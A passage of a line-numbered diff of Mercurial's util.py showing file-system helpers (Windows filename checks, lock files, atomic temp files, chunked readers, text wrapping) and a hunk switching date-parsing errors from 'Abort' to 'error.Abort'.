1666 >>> checkwinfilename(b"foo\\/bar")
1667 "directory name ends with '\\', which is invalid on Windows"
1668 '''
1669 if path.endswith('\\'):
1670 return _("filename ends with '\\', which is invalid on Windows")
1671 if '\\/' in path:
1672 return _("directory name ends with '\\', which is invalid on Windows")
1673 for n in path.replace('\\', '/').split('/'):
1674 if not n:
1675 continue
1676 for c in _filenamebytestr(n):
1677 if c in _winreservedchars:
1678 return _("filename contains '%s', which is reserved "
1679 "on Windows") % c
1680 if ord(c) <= 31:
1681 return _("filename contains '%s', which is invalid "
1682 "on Windows") % escapestr(c)
1683 base = n.split('.')[0]
1684 if base and base.lower() in _winreservednames:
1685 return _("filename contains '%s', which is reserved "
1686 "on Windows") % base
1687 t = n[-1:]
1688 if t in '. ' and n not in '..':
1689 return _("filename ends with '%s', which is not allowed "
1690 "on Windows") % t
1691
1692 if pycompat.iswindows:
1693 checkosfilename = checkwinfilename
1694 timer = time.clock
1695 else:
1696 checkosfilename = platform.checkosfilename
1697 timer = time.time
1698
1699 if safehasattr(time, "perf_counter"):
1700 timer = time.perf_counter
1701
1702 def makelock(info, pathname):
1703 try:
1704 return os.symlink(info, pathname)
1705 except OSError as why:
1706 if why.errno == errno.EEXIST:
1707 raise
1708 except AttributeError: # no symlink in os
1709 pass
1710
1711 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1712 os.write(ld, info)
1713 os.close(ld)
1714
1715 def readlock(pathname):
1716 try:
1717 return os.readlink(pathname)
1718 except OSError as why:
1719 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1720 raise
1721 except AttributeError: # no symlink in os
1722 pass
1723 fp = posixfile(pathname)
1724 r = fp.read()
1725 fp.close()
1726 return r
1727
1728 def fstat(fp):
1729 '''stat file object that may not have fileno method.'''
1730 try:
1731 return os.fstat(fp.fileno())
1732 except AttributeError:
1733 return os.stat(fp.name)
1734
1735 # File system features
1736
1737 def fscasesensitive(path):
1738 """
1739 Return true if the given path is on a case-sensitive filesystem
1740
1741 Requires a path (like /foo/.hg) ending with a foldable final
1742 directory component.
1743 """
1744 s1 = os.lstat(path)
1745 d, b = os.path.split(path)
1746 b2 = b.upper()
1747 if b == b2:
1748 b2 = b.lower()
1749 if b == b2:
1750 return True # no evidence against case sensitivity
1751 p2 = os.path.join(d, b2)
1752 try:
1753 s2 = os.lstat(p2)
1754 if s2 == s1:
1755 return False
1756 return True
1757 except OSError:
1758 return True
1759
1760 try:
1761 import re2
1762 _re2 = None
1763 except ImportError:
1764 _re2 = False
1765
1766 class _re(object):
1767 def _checkre2(self):
1768 global _re2
1769 try:
1770 # check if match works, see issue3964
1771 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1772 except ImportError:
1773 _re2 = False
1774
1775 def compile(self, pat, flags=0):
1776 '''Compile a regular expression, using re2 if possible
1777
1778 For best performance, use only re2-compatible regexp features. The
1779 only flags from the re module that are re2-compatible are
1780 IGNORECASE and MULTILINE.'''
1781 if _re2 is None:
1782 self._checkre2()
1783 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1784 if flags & remod.IGNORECASE:
1785 pat = '(?i)' + pat
1786 if flags & remod.MULTILINE:
1787 pat = '(?m)' + pat
1788 try:
1789 return re2.compile(pat)
1790 except re2.error:
1791 pass
1792 return remod.compile(pat, flags)
1793
1794 @propertycache
1795 def escape(self):
1796 '''Return the version of escape corresponding to self.compile.
1797
1798 This is imperfect because whether re2 or re is used for a particular
1799 function depends on the flags, etc, but it's the best we can do.
1800 '''
1801 global _re2
1802 if _re2 is None:
1803 self._checkre2()
1804 if _re2:
1805 return re2.escape
1806 else:
1807 return remod.escape
1808
1809 re = _re()
1810
1811 _fspathcache = {}
1812 def fspath(name, root):
1813 '''Get name in the case stored in the filesystem
1814
1815 The name should be relative to root, and be normcase-ed for efficiency.
1816
1817 Note that this function is unnecessary, and should not be
1818 called, for case-sensitive filesystems (simply because it's expensive).
1819
1820 The root should be normcase-ed, too.
1821 '''
1822 def _makefspathcacheentry(dir):
1823 return dict((normcase(n), n) for n in os.listdir(dir))
1824
1825 seps = pycompat.ossep
1826 if pycompat.osaltsep:
1827 seps = seps + pycompat.osaltsep
1828 # Protect backslashes. This gets silly very quickly.
1829 seps.replace('\\','\\\\')
1830 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1831 dir = os.path.normpath(root)
1832 result = []
1833 for part, sep in pattern.findall(name):
1834 if sep:
1835 result.append(sep)
1836 continue
1837
1838 if dir not in _fspathcache:
1839 _fspathcache[dir] = _makefspathcacheentry(dir)
1840 contents = _fspathcache[dir]
1841
1842 found = contents.get(part)
1843 if not found:
1844 # retry "once per directory" per "dirstate.walk" which
1845 # may take place for each patches of "hg qpush", for example
1846 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1847 found = contents.get(part)
1848
1849 result.append(found or part)
1850 dir = os.path.join(dir, part)
1851
1852 return ''.join(result)
1853
1854 def checknlink(testfile):
1855 '''check whether hardlink count reporting works properly'''
1856
1857 # testfile may be open, so we need a separate file for checking to
1858 # work around issue2543 (or testfile may get lost on Samba shares)
1859 f1, f2, fp = None, None, None
1860 try:
1861 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1862 suffix='1~', dir=os.path.dirname(testfile))
1863 os.close(fd)
1864 f2 = '%s2~' % f1[:-2]
1865
1866 oslink(f1, f2)
1867 # nlinks() may behave differently for files on Windows shares if
1868 # the file is open.
1869 fp = posixfile(f2)
1870 return nlinks(f2) > 1
1871 except OSError:
1872 return False
1873 finally:
1874 if fp is not None:
1875 fp.close()
1876 for f in (f1, f2):
1877 try:
1878 if f is not None:
1879 os.unlink(f)
1880 except OSError:
1881 pass
1882
1883 def endswithsep(path):
1884 '''Check path ends with os.sep or os.altsep.'''
1885 return (path.endswith(pycompat.ossep)
1886 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1887
1888 def splitpath(path):
1889 '''Split path by os.sep.
1890 Note that this function does not use os.altsep because this is
1891 an alternative of simple "xxx.split(os.sep)".
1892 It is recommended to use os.path.normpath() before using this
1893 function if need.'''
1894 return path.split(pycompat.ossep)
1895
1896 def gui():
1897 '''Are we running in a GUI?'''
1898 if pycompat.isdarwin:
1899 if 'SSH_CONNECTION' in encoding.environ:
1900 # handle SSH access to a box where the user is logged in
1901 return False
1902 elif getattr(osutil, 'isgui', None):
1903 # check if a CoreGraphics session is available
1904 return osutil.isgui()
1905 else:
1906 # pure build; use a safe default
1907 return True
1908 else:
1909 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1910
1911 def mktempcopy(name, emptyok=False, createmode=None):
1912 """Create a temporary file with the same contents from name
1913
1914 The permission bits are copied from the original file.
1915
1916 If the temporary file is going to be truncated immediately, you
1917 can use emptyok=True as an optimization.
1918
1919 Returns the name of the temporary file.
1920 """
1921 d, fn = os.path.split(name)
1922 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1923 os.close(fd)
1924 # Temporary files are created with mode 0600, which is usually not
1925 # what we want. If the original file already exists, just copy
1926 # its mode. Otherwise, manually obey umask.
1927 copymode(name, temp, createmode)
1928 if emptyok:
1929 return temp
1930 try:
1931 try:
1932 ifp = posixfile(name, "rb")
1933 except IOError as inst:
1934 if inst.errno == errno.ENOENT:
1935 return temp
1936 if not getattr(inst, 'filename', None):
1937 inst.filename = name
1938 raise
1939 ofp = posixfile(temp, "wb")
1940 for chunk in filechunkiter(ifp):
1941 ofp.write(chunk)
1942 ifp.close()
1943 ofp.close()
1944 except: # re-raises
1945 try:
1946 os.unlink(temp)
1947 except OSError:
1948 pass
1949 raise
1950 return temp
1951
1952 class filestat(object):
1953 """help to exactly detect change of a file
1954
1955 'stat' attribute is result of 'os.stat()' if specified 'path'
1956 exists. Otherwise, it is None. This can avoid preparative
1957 'exists()' examination on client side of this class.
1958 """
1959 def __init__(self, stat):
1960 self.stat = stat
1961
1962 @classmethod
1963 def frompath(cls, path):
1964 try:
1965 stat = os.stat(path)
1966 except OSError as err:
1967 if err.errno != errno.ENOENT:
1968 raise
1969 stat = None
1970 return cls(stat)
1971
1972 @classmethod
1973 def fromfp(cls, fp):
1974 stat = os.fstat(fp.fileno())
1975 return cls(stat)
1976
1977 __hash__ = object.__hash__
1978
1979 def __eq__(self, old):
1980 try:
1981 # if ambiguity between stat of new and old file is
1982 # avoided, comparison of size, ctime and mtime is enough
1983 # to exactly detect change of a file regardless of platform
1984 return (self.stat.st_size == old.stat.st_size and
1985 self.stat.st_ctime == old.stat.st_ctime and
1986 self.stat.st_mtime == old.stat.st_mtime)
1987 except AttributeError:
1988 pass
1989 try:
1990 return self.stat is None and old.stat is None
1991 except AttributeError:
1992 return False
1993
1994 def isambig(self, old):
1995 """Examine whether new (= self) stat is ambiguous against old one
1996
1997 "S[N]" below means stat of a file at N-th change:
1998
1999 - S[n-1].ctime < S[n].ctime: can detect change of a file
2000 - S[n-1].ctime == S[n].ctime
2001 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2002 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2003 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2004 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2005
2006 Case (*2) above means that a file was changed twice or more at
2007 same time in sec (= S[n-1].ctime), and comparison of timestamp
2008 is ambiguous.
2009
2010 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2011 timestamp is ambiguous".
2012
2013 But advancing mtime only in case (*2) doesn't work as
2014 expected, because naturally advanced S[n].mtime in case (*1)
2015 might be equal to manually advanced S[n-1 or earlier].mtime.
2016
2017 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2018 treated as ambiguous regardless of mtime, to avoid overlooking
2019 by confliction between such mtime.
2020
2021 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2022 S[n].mtime", even if size of a file isn't changed.
2023 """
2024 try:
2025 return (self.stat.st_ctime == old.stat.st_ctime)
2026 except AttributeError:
2027 return False
2028
2029 def avoidambig(self, path, old):
2030 """Change file stat of specified path to avoid ambiguity
2031
2032 'old' should be previous filestat of 'path'.
2033
2034 This skips avoiding ambiguity, if a process doesn't have
2035 appropriate privileges for 'path'. This returns False in this
2036 case.
2037
2038 Otherwise, this returns True, as "ambiguity is avoided".
2039 """
2040 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2041 try:
2042 os.utime(path, (advanced, advanced))
2043 except OSError as inst:
2044 if inst.errno == errno.EPERM:
2045 # utime() on the file created by another user causes EPERM,
2046 # if a process doesn't have appropriate privileges
2047 return False
2048 raise
2049 return True
2050
2051 def __ne__(self, other):
2052 return not self == other
2053
2054 class atomictempfile(object):
2055 '''writable file object that atomically updates a file
2056
2057 All writes will go to a temporary copy of the original file. Call
2058 close() when you are done writing, and atomictempfile will rename
2059 the temporary copy to the original name, making the changes
2060 visible. If the object is destroyed without being closed, all your
2061 writes are discarded.
2062
2063 checkambig argument of constructor is used with filestat, and is
2064 useful only if target file is guarded by any lock (e.g. repo.lock
2065 or repo.wlock).
2066 '''
2067 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2068 self.__name = name # permanent name
2069 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2070 createmode=createmode)
2071 self._fp = posixfile(self._tempname, mode)
2072 self._checkambig = checkambig
2073
2074 # delegated methods
2075 self.read = self._fp.read
2076 self.write = self._fp.write
2077 self.seek = self._fp.seek
2078 self.tell = self._fp.tell
2079 self.fileno = self._fp.fileno
2080
2081 def close(self):
2082 if not self._fp.closed:
2083 self._fp.close()
2084 filename = localpath(self.__name)
2085 oldstat = self._checkambig and filestat.frompath(filename)
2086 if oldstat and oldstat.stat:
2087 rename(self._tempname, filename)
2088 newstat = filestat.frompath(filename)
2089 if newstat.isambig(oldstat):
2090 # stat of changed file is ambiguous to original one
2091 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2092 os.utime(filename, (advanced, advanced))
2093 else:
2094 rename(self._tempname, filename)
2095
2096 def discard(self):
2097 if not self._fp.closed:
2098 try:
2099 os.unlink(self._tempname)
2100 except OSError:
2101 pass
2102 self._fp.close()
2103
2104 def __del__(self):
2105 if safehasattr(self, '_fp'): # constructor actually did something
2106 self.discard()
2107
2108 def __enter__(self):
2109 return self
2110
2111 def __exit__(self, exctype, excvalue, traceback):
2112 if exctype is not None:
2113 self.discard()
2114 else:
2115 self.close()
2116
2117 def unlinkpath(f, ignoremissing=False):
2118 """unlink and remove the directory if it is empty"""
2119 if ignoremissing:
2120 tryunlink(f)
2121 else:
2122 unlink(f)
2123 # try removing directories that might now be empty
2124 try:
2125 removedirs(os.path.dirname(f))
2126 except OSError:
2127 pass
2128
2129 def tryunlink(f):
2130 """Attempt to remove a file, ignoring ENOENT errors."""
2131 try:
2132 unlink(f)
2133 except OSError as e:
2134 if e.errno != errno.ENOENT:
2135 raise
2136
2137 def makedirs(name, mode=None, notindexed=False):
2138 """recursive directory creation with parent mode inheritance
2139
2140 Newly created directories are marked as "not to be indexed by
2141 the content indexing service", if ``notindexed`` is specified
2142 for "write" mode access.
2143 """
2144 try:
2145 makedir(name, notindexed)
2146 except OSError as err:
2147 if err.errno == errno.EEXIST:
2148 return
2149 if err.errno != errno.ENOENT or not name:
2150 raise
2151 parent = os.path.dirname(os.path.abspath(name))
2152 if parent == name:
2153 raise
2154 makedirs(parent, mode, notindexed)
2155 try:
2156 makedir(name, notindexed)
2157 except OSError as err:
2158 # Catch EEXIST to handle races
2159 if err.errno == errno.EEXIST:
2160 return
2161 raise
2162 if mode is not None:
2163 os.chmod(name, mode)
2164
2165 def readfile(path):
2166 with open(path, 'rb') as fp:
2167 return fp.read()
2168
2169 def writefile(path, text):
2170 with open(path, 'wb') as fp:
2171 fp.write(text)
2172
2173 def appendfile(path, text):
2174 with open(path, 'ab') as fp:
2175 fp.write(text)
2176
2177 class chunkbuffer(object):
2178 """Allow arbitrary sized chunks of data to be efficiently read from an
2179 iterator over chunks of arbitrary size."""
2180
2181 def __init__(self, in_iter):
2182 """in_iter is the iterator that's iterating over the input chunks."""
2183 def splitbig(chunks):
2184 for chunk in chunks:
2185 if len(chunk) > 2**20:
2186 pos = 0
2187 while pos < len(chunk):
2188 end = pos + 2 ** 18
2189 yield chunk[pos:end]
2190 pos = end
2191 else:
2192 yield chunk
2193 self.iter = splitbig(in_iter)
2194 self._queue = collections.deque()
2195 self._chunkoffset = 0
2196
2197 def read(self, l=None):
2198 """Read L bytes of data from the iterator of chunks of data.
2199 Returns less than L bytes if the iterator runs dry.
2200
2201 If size parameter is omitted, read everything"""
2202 if l is None:
2203 return ''.join(self.iter)
2204
2205 left = l
2206 buf = []
2207 queue = self._queue
2208 while left > 0:
2209 # refill the queue
2210 if not queue:
2211 target = 2**18
2212 for chunk in self.iter:
2213 queue.append(chunk)
2214 target -= len(chunk)
2215 if target <= 0:
2216 break
2217 if not queue:
2218 break
2219
2220 # The easy way to do this would be to queue.popleft(), modify the
2221 # chunk (if necessary), then queue.appendleft(). However, for cases
2222 # where we read partial chunk content, this incurs 2 dequeue
2223 # mutations and creates a new str for the remaining chunk in the
2224 # queue. Our code below avoids this overhead.
2225
2226 chunk = queue[0]
2227 chunkl = len(chunk)
2228 offset = self._chunkoffset
2229
2230 # Use full chunk.
2231 if offset == 0 and left >= chunkl:
2232 left -= chunkl
2233 queue.popleft()
2234 buf.append(chunk)
2235 # self._chunkoffset remains at 0.
2236 continue
2237
2238 chunkremaining = chunkl - offset
2239
2240 # Use all of unconsumed part of chunk.
2241 if left >= chunkremaining:
2242 left -= chunkremaining
2243 queue.popleft()
2244 # offset == 0 is enabled by block above, so this won't merely
2245 # copy via ``chunk[0:]``.
2246 buf.append(chunk[offset:])
2247 self._chunkoffset = 0
2248
2249 # Partial chunk needed.
2250 else:
2251 buf.append(chunk[offset:offset + left])
2252 self._chunkoffset += left
2253 left -= chunkremaining
2254
2255 return ''.join(buf)
2256
2257 def filechunkiter(f, size=131072, limit=None):
2258 """Create a generator that produces the data in the file size
2259 (default 131072) bytes at a time, up to optional limit (default is
2260 to read all data). Chunks may be less than size bytes if the
2261 chunk is the last chunk in the file, or the file is a socket or
2262 some other type of file that sometimes reads less data than is
2263 requested."""
2264 assert size >= 0
2265 assert limit is None or limit >= 0
2266 while True:
2267 if limit is None:
2268 nbytes = size
2269 else:
2270 nbytes = min(limit, size)
2271 s = nbytes and f.read(nbytes)
2272 if not s:
2273 break
2274 if limit:
2275 limit -= len(s)
2276 yield s
2277
2278 class cappedreader(object):
2279 """A file object proxy that allows reading up to N bytes.
2280
2281 Given a source file object, instances of this type allow reading up to
2282 N bytes from that source file object. Attempts to read past the allowed
2283 limit are treated as EOF.
2284
2285 It is assumed that I/O is not performed on the original file object
2286 in addition to I/O that is performed by this instance. If there is,
2287 state tracking will get out of sync and unexpected results will ensue.
2288 """
2289 def __init__(self, fh, limit):
2290 """Allow reading up to <limit> bytes from <fh>."""
2291 self._fh = fh
2292 self._left = limit
2293
2294 def read(self, n=-1):
2295 if not self._left:
2296 return b''
2297
2298 if n < 0:
2299 n = self._left
2300
2301 data = self._fh.read(min(n, self._left))
2302 self._left -= len(data)
2303 assert self._left >= 0
2304
2305 return data
2306
2307 63 def makedate(timestamp=None):
2308 64 '''Return a unix timestamp (or the current time) as a (unixtime,
2309 65 offset) tuple based off the local timezone.'''
@@ -2311,7 +67,7 b' def makedate(timestamp=None):'
2311 67 timestamp = time.time()
2312 68 if timestamp < 0:
2313 69 hint = _("check your clock")
2314 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
70 raise error.Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2315 71 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2316 72 datetime.datetime.fromtimestamp(timestamp))
2317 73 tz = delta.days * 86400 + delta.seconds
@@ -2546,24 +302,24 b' def matchdate(date):'
2546 302 date = date.strip()
2547 303
2548 304 if not date:
2549 raise Abort(_("dates cannot consist entirely of whitespace"))
305 raise error.Abort(_("dates cannot consist entirely of whitespace"))
2550 306 elif date[0] == "<":
2551 307 if not date[1:]:
2552 raise Abort(_("invalid day spec, use '<DATE'"))
308 raise error.Abort(_("invalid day spec, use '<DATE'"))
2553 309 when = upper(date[1:])
2554 310 return lambda x: x <= when
2555 311 elif date[0] == ">":
2556 312 if not date[1:]:
2557 raise Abort(_("invalid day spec, use '>DATE'"))
313 raise error.Abort(_("invalid day spec, use '>DATE'"))
2558 314 when = lower(date[1:])
2559 315 return lambda x: x >= when
2560 316 elif date[0] == "-":
2561 317 try:
2562 318 days = int(date[1:])
2563 319 except ValueError:
2564 raise Abort(_("invalid day spec: %s") % date[1:])
320 raise error.Abort(_("invalid day spec: %s") % date[1:])
2565 321 if days < 0:
2566 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
322 raise error.Abort(_("%s must be nonnegative (see 'hg help dates')")
2567 323 % date[1:])
2568 324 when = makedate()[0] - days * 3600 * 24
2569 325 return lambda x: x >= when
@@ -2574,1732 +330,3 b' def matchdate(date):'
2574 330 else:
2575 331 start, stop = lower(date), upper(date)
2576 332 return lambda x: x >= start and x <= stop
2577
2578 def stringmatcher(pattern, casesensitive=True):
2579 """
2580 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2581 returns the matcher name, pattern, and matcher function.
2582 missing or unknown prefixes are treated as literal matches.
2583
2584 helper for tests:
2585 >>> def test(pattern, *tests):
2586 ... kind, pattern, matcher = stringmatcher(pattern)
2587 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2588 >>> def itest(pattern, *tests):
2589 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2590 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2591
2592 exact matching (no prefix):
2593 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2594 ('literal', 'abcdefg', [False, False, True])
2595
2596 regex matching ('re:' prefix)
2597 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2598 ('re', 'a.+b', [False, False, True])
2599
2600 force exact matches ('literal:' prefix)
2601 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2602 ('literal', 're:foobar', [False, True])
2603
2604 unknown prefixes are ignored and treated as literals
2605 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2606 ('literal', 'foo:bar', [False, False, True])
2607
2608 case insensitive regex matches
2609 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2610 ('re', 'A.+b', [False, False, True])
2611
2612 case insensitive literal matches
2613 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2614 ('literal', 'ABCDEFG', [False, False, True])
2615 """
2616 if pattern.startswith('re:'):
2617 pattern = pattern[3:]
2618 try:
2619 flags = 0
2620 if not casesensitive:
2621 flags = remod.I
2622 regex = remod.compile(pattern, flags)
2623 except remod.error as e:
2624 raise error.ParseError(_('invalid regular expression: %s')
2625 % e)
2626 return 're', pattern, regex.search
2627 elif pattern.startswith('literal:'):
2628 pattern = pattern[8:]
2629
2630 match = pattern.__eq__
2631
2632 if not casesensitive:
2633 ipat = encoding.lower(pattern)
2634 match = lambda s: ipat == encoding.lower(s)
2635 return 'literal', pattern, match
2636
2637 def shortuser(user):
2638 """Return a short representation of a user name or email address."""
2639 f = user.find('@')
2640 if f >= 0:
2641 user = user[:f]
2642 f = user.find('<')
2643 if f >= 0:
2644 user = user[f + 1:]
2645 f = user.find(' ')
2646 if f >= 0:
2647 user = user[:f]
2648 f = user.find('.')
2649 if f >= 0:
2650 user = user[:f]
2651 return user
2652
2653 def emailuser(user):
2654 """Return the user portion of an email address."""
2655 f = user.find('@')
2656 if f >= 0:
2657 user = user[:f]
2658 f = user.find('<')
2659 if f >= 0:
2660 user = user[f + 1:]
2661 return user
2662
2663 def email(author):
2664 '''get email of author.'''
2665 r = author.find('>')
2666 if r == -1:
2667 r = None
2668 return author[author.find('<') + 1:r]
2669
2670 def ellipsis(text, maxlength=400):
2671 """Trim string to at most maxlength (default: 400) columns in display."""
2672 return encoding.trim(text, maxlength, ellipsis='...')
2673
2674 def unitcountfn(*unittable):
2675 '''return a function that renders a readable count of some quantity'''
2676
2677 def go(count):
2678 for multiplier, divisor, format in unittable:
2679 if abs(count) >= divisor * multiplier:
2680 return format % (count / float(divisor))
2681 return unittable[-1][2] % count
2682
2683 return go
2684
2685 def processlinerange(fromline, toline):
2686 """Check that linerange <fromline>:<toline> makes sense and return a
2687 0-based range.
2688
2689 >>> processlinerange(10, 20)
2690 (9, 20)
2691 >>> processlinerange(2, 1)
2692 Traceback (most recent call last):
2693 ...
2694 ParseError: line range must be positive
2695 >>> processlinerange(0, 5)
2696 Traceback (most recent call last):
2697 ...
2698 ParseError: fromline must be strictly positive
2699 """
2700 if toline - fromline < 0:
2701 raise error.ParseError(_("line range must be positive"))
2702 if fromline < 1:
2703 raise error.ParseError(_("fromline must be strictly positive"))
2704 return fromline - 1, toline
2705
2706 bytecount = unitcountfn(
2707 (100, 1 << 30, _('%.0f GB')),
2708 (10, 1 << 30, _('%.1f GB')),
2709 (1, 1 << 30, _('%.2f GB')),
2710 (100, 1 << 20, _('%.0f MB')),
2711 (10, 1 << 20, _('%.1f MB')),
2712 (1, 1 << 20, _('%.2f MB')),
2713 (100, 1 << 10, _('%.0f KB')),
2714 (10, 1 << 10, _('%.1f KB')),
2715 (1, 1 << 10, _('%.2f KB')),
2716 (1, 1, _('%.0f bytes')),
2717 )
2718
2719 # Matches a single EOL which can either be a CRLF where repeated CR
2720 # are removed or a LF. We do not care about old Macintosh files, so a
2721 # stray CR is an error.
2722 _eolre = remod.compile(br'\r*\n')
2723
2724 def tolf(s):
2725 return _eolre.sub('\n', s)
2726
2727 def tocrlf(s):
2728 return _eolre.sub('\r\n', s)
2729
2730 if pycompat.oslinesep == '\r\n':
2731 tonativeeol = tocrlf
2732 fromnativeeol = tolf
2733 else:
2734 tonativeeol = pycompat.identity
2735 fromnativeeol = pycompat.identity
2736
2737 def escapestr(s):
2738 # call underlying function of s.encode('string_escape') directly for
2739 # Python 3 compatibility
2740 return codecs.escape_encode(s)[0]
2741
2742 def unescapestr(s):
2743 return codecs.escape_decode(s)[0]
2744
2745 def forcebytestr(obj):
2746 """Portably format an arbitrary object (e.g. exception) into a byte
2747 string."""
2748 try:
2749 return pycompat.bytestr(obj)
2750 except UnicodeEncodeError:
2751 # non-ascii string, may be lossy
2752 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2753
2754 def uirepr(s):
2755 # Avoid double backslash in Windows path repr()
2756 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2757
2758 # delay import of textwrap
2759 def MBTextWrapper(**kwargs):
2760 class tw(textwrap.TextWrapper):
2761 """
2762 Extend TextWrapper for width-awareness.
2763
2764 Neither number of 'bytes' in any encoding nor 'characters' is
2765 appropriate to calculate terminal columns for specified string.
2766
2767 Original TextWrapper implementation uses built-in 'len()' directly,
2768 so overriding is needed to use width information of each characters.
2769
2770 In addition, characters classified into 'ambiguous' width are
2771 treated as wide in East Asian area, but as narrow in other.
2772
2773 This requires use decision to determine width of such characters.
2774 """
2775 def _cutdown(self, ucstr, space_left):
2776 l = 0
2777 colwidth = encoding.ucolwidth
2778 for i in xrange(len(ucstr)):
2779 l += colwidth(ucstr[i])
2780 if space_left < l:
2781 return (ucstr[:i], ucstr[i:])
2782 return ucstr, ''
2783
2784 # overriding of base class
2785 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2786 space_left = max(width - cur_len, 1)
2787
2788 if self.break_long_words:
2789 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2790 cur_line.append(cut)
2791 reversed_chunks[-1] = res
2792 elif not cur_line:
2793 cur_line.append(reversed_chunks.pop())
2794
2795 # this overriding code is imported from TextWrapper of Python 2.6
2796 # to calculate columns of string by 'encoding.ucolwidth()'
2797 def _wrap_chunks(self, chunks):
2798 colwidth = encoding.ucolwidth
2799
2800 lines = []
2801 if self.width <= 0:
2802 raise ValueError("invalid width %r (must be > 0)" % self.width)
2803
2804 # Arrange in reverse order so items can be efficiently popped
2805 # from a stack of chucks.
2806 chunks.reverse()
2807
2808 while chunks:
2809
2810 # Start the list of chunks that will make up the current line.
2811 # cur_len is just the length of all the chunks in cur_line.
2812 cur_line = []
2813 cur_len = 0
2814
2815 # Figure out which static string will prefix this line.
2816 if lines:
2817 indent = self.subsequent_indent
2818 else:
2819 indent = self.initial_indent
2820
2821 # Maximum width for this line.
2822 width = self.width - len(indent)
2823
2824 # First chunk on line is whitespace -- drop it, unless this
2825 # is the very beginning of the text (i.e. no lines started yet).
2826 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2827 del chunks[-1]
2828
2829 while chunks:
2830 l = colwidth(chunks[-1])
2831
2832 # Can at least squeeze this chunk onto the current line.
2833 if cur_len + l <= width:
2834 cur_line.append(chunks.pop())
2835 cur_len += l
2836
2837 # Nope, this line is full.
2838 else:
2839 break
2840
2841 # The current line is full, and the next chunk is too big to
2842 # fit on *any* line (not just this one).
2843 if chunks and colwidth(chunks[-1]) > width:
2844 self._handle_long_word(chunks, cur_line, cur_len, width)
2845
2846 # If the last chunk on this line is all whitespace, drop it.
2847 if (self.drop_whitespace and
2848 cur_line and cur_line[-1].strip() == r''):
2849 del cur_line[-1]
2850
2851 # Convert current line back to a string and store it in list
2852 # of all lines (return value).
2853 if cur_line:
2854 lines.append(indent + r''.join(cur_line))
2855
2856 return lines
2857
2858 global MBTextWrapper
2859 MBTextWrapper = tw
2860 return tw(**kwargs)
2861
2862 def wrap(line, width, initindent='', hangindent=''):
2863 maxindent = max(len(hangindent), len(initindent))
2864 if width <= maxindent:
2865 # adjust for weird terminal size
2866 width = max(78, maxindent + 1)
2867 line = line.decode(pycompat.sysstr(encoding.encoding),
2868 pycompat.sysstr(encoding.encodingmode))
2869 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2870 pycompat.sysstr(encoding.encodingmode))
2871 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2872 pycompat.sysstr(encoding.encodingmode))
2873 wrapper = MBTextWrapper(width=width,
2874 initial_indent=initindent,
2875 subsequent_indent=hangindent)
2876 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2877
2878 if (pyplatform.python_implementation() == 'CPython' and
2879 sys.version_info < (3, 0)):
2880 # There is an issue in CPython that some IO methods do not handle EINTR
2881 # correctly. The following table shows what CPython version (and functions)
2882 # are affected (buggy: has the EINTR bug, okay: otherwise):
2883 #
2884 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2885 # --------------------------------------------------
2886 # fp.__iter__ | buggy | buggy | okay
2887 # fp.read* | buggy | okay [1] | okay
2888 #
2889 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2890 #
2891 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2892 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2893 #
2894 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2895 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2896 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2897 # fp.__iter__ but not other fp.read* methods.
2898 #
2899 # On modern systems like Linux, the "read" syscall cannot be interrupted
2900 # when reading "fast" files like on-disk files. So the EINTR issue only
2901 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2902 # files approximately as "fast" files and use the fast (unsafe) code path,
2903 # to minimize the performance impact.
2904 if sys.version_info >= (2, 7, 4):
2905 # fp.readline deals with EINTR correctly, use it as a workaround.
2906 def _safeiterfile(fp):
